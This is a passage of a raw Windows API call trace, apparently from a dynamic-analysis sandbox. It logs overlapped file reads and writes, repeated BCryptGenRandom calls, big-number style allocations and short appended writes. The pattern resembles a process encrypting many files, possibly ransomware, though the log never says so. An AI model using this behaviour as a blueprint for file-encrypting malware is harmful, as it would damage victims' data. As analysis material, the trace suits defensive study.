GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0172.845] CloseHandle (hObject=0x2a4) returned 1 [0172.845] free (_Block=0x3df0008) [0172.845] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0173.401] ReadFile (in: hFile=0x2a4, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x3c45, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0173.411] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0173.427] ReadFile (in: hFile=0x3cc, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x1016, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 0x0 [0173.440] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0173.464] WriteFile (in: hFile=0x2a8, lpBuffer=0x3ef003c*, nNumberOfBytesToWrite=0x49e0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008) returned 1 [0173.465] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0173.474] WriteFile (in: hFile=0x338, lpBuffer=0x3f7007c*, nNumberOfBytesToWrite=0x78b0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048) returned 1 [0173.474] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0173.483] ReadFile (in: hFile=0x3cc, lpBuffer=0x3d70484, nNumberOfBytesToRead=0xa343, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 0x0 [0173.489] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0173.499] CloseHandle (hObject=0x3cc) returned 1 [0173.499] free (_Block=0x3d70450) [0173.499] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0173.503] WriteFile (in: hFile=0xec, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0xa450, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0173.503] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0173.504] WriteFile (in: hFile=0x338, lpBuffer=0x3f7007c*, nNumberOfBytesToWrite=0x2bb0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048) returned 1 [0173.504] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0173.507] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x3100, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0173.507] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0173.549] WriteFile (in: hFile=0xec, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0xf00, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0173.549] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0173.559] WriteFile (in: hFile=0x2a4, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x7ab0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0173.559] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0173.565] ReadFile (in: hFile=0x170, lpBuffer=0x3ef003c, nNumberOfBytesToRead=0x3d6, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008) returned 1 [0173.566] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0173.574] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0173.575] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0173.575] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0173.575] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0173.575] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0173.575] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0173.576] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0173.576] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0173.576] free (_Block=0x3e305b8) [0173.576] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0173.576] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0173.576] free (_Block=0x1fa91d0) [0173.576] free (_Block=0x1fa2ed8) [0173.576] free (_Block=0x1fa90b8) [0173.576] WriteFile (in: hFile=0xec, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x616, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0173.576] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0173.592] CloseHandle (hObject=0xec) returned 1 [0173.592] free (_Block=0x1ff1e60) [0173.592] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0173.614] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0173.615] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0173.615] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0173.615] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0173.615] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0173.615] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0173.615] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0173.616] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0173.616] free (_Block=0x3e305b8) [0173.616] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0173.616] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0173.616] free (_Block=0x1fa91d0) [0173.616] free (_Block=0x1fa2ed8) [0173.616] free (_Block=0x1fa90b8) [0173.616] WriteFile (in: hFile=0x170, lpBuffer=0x3ef003c*, nNumberOfBytesToWrite=0x61e, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008) returned 1 [0173.616] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0173.621] CloseHandle (hObject=0x2a4) returned 1 [0173.622] free (_Block=0x3d70450) [0173.622] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0173.633] CloseHandle (hObject=0x170) returned 1 [0173.633] free (_Block=0x3ef0008) [0173.633] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0173.642] ReadFile (in: hFile=0xec, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x6ec, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0173.642] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0173.648] ReadFile (in: hFile=0x2a4, lpBuffer=0x3d70484, nNumberOfBytesToRead=0xd16, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 0x0 [0173.648] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0173.733] WriteFile (in: hFile=0xec, lpBuffer=0x3e7003c, nNumberOfBytesToWrite=0x2a10, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 0x0 [0173.733] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0174.876] WriteFile (in: hFile=0x2a4, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x2840, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0174.876] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0174.889] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0174.889] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0174.889] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0174.889] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0174.890] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0174.890] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0174.893] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0174.893] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0174.893] free (_Block=0x3e305b8) [0174.893] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0174.893] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0174.894] free (_Block=0x1fa91d0) [0174.894] free (_Block=0x1fa2ed8) [0174.894] free (_Block=0x1fa90b8) [0174.894] WriteFile (in: hFile=0x3cc, lpBuffer=0x3f7007c, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048) returned 0x0 [0174.894] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0175.019] CloseHandle (hObject=0x170) returned 1 [0175.020] free (_Block=0x3e70008) [0175.020] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0175.020] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.020] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.020] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0175.020] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.021] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.021] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0175.021] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0175.021] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0175.021] free (_Block=0x3e305b8) [0175.021] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0175.021] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0175.022] free (_Block=0x1fa91d0) [0175.022] free (_Block=0x1fa2ed8) [0175.022] free (_Block=0x1fa90b8) [0175.022] WriteFile (in: hFile=0x338, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x61a, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0175.022] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0175.023] WriteFile (in: hFile=0x338, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x2930, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0175.023] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0175.047] WriteFile (in: hFile=0x338, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x2ea0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0175.047] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0175.060] WriteFile (in: hFile=0x170, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x4f80, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0175.060] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0175.077] ReadFile (in: hFile=0x170, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x1e5c, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0175.078] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0175.078] CloseHandle (hObject=0x170) returned 1 [0175.078] free (_Block=0x1ff1e60) [0175.078] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0175.084] CloseHandle (hObject=0x338) returned 1 [0175.084] free (_Block=0x3df0008) [0175.084] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0175.101] ReadFile (in: hFile=0x338, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x3642, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0175.101] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0175.102] CloseHandle (hObject=0x338) returned 1 [0175.102] free (_Block=0x3df0008) [0175.102] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0175.114] ReadFile (in: hFile=0x170, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x476e, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0175.115] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0175.115] CloseHandle (hObject=0x170) returned 1 [0175.115] free (_Block=0x1ff1e60) [0175.116] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0175.127] ReadFile (in: hFile=0x338, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xd8e0, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0175.128] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0175.129] CloseHandle (hObject=0x338) returned 1 [0175.129] free (_Block=0x3df0008) [0175.129] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0175.137] ReadFile (in: hFile=0x170, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10cb8, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0175.138] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0175.139] CloseHandle (hObject=0x170) returned 1 [0175.139] free (_Block=0x1ff1e60) [0175.139] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0175.166] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x7a04, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0175.167] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0175.168] CloseHandle (hObject=0x170) returned 1 [0175.168] free (_Block=0x3df0008) [0175.168] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0175.172] ReadFile (in: hFile=0x338, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0xee4a, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0175.173] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0175.174] CloseHandle (hObject=0x338) returned 1 [0175.174] free (_Block=0x1ff1e60) [0175.174] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0175.201] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.201] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.201] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0175.201] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.202] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.202] BCryptGenRandom (in: hAlgorithm=0x0, 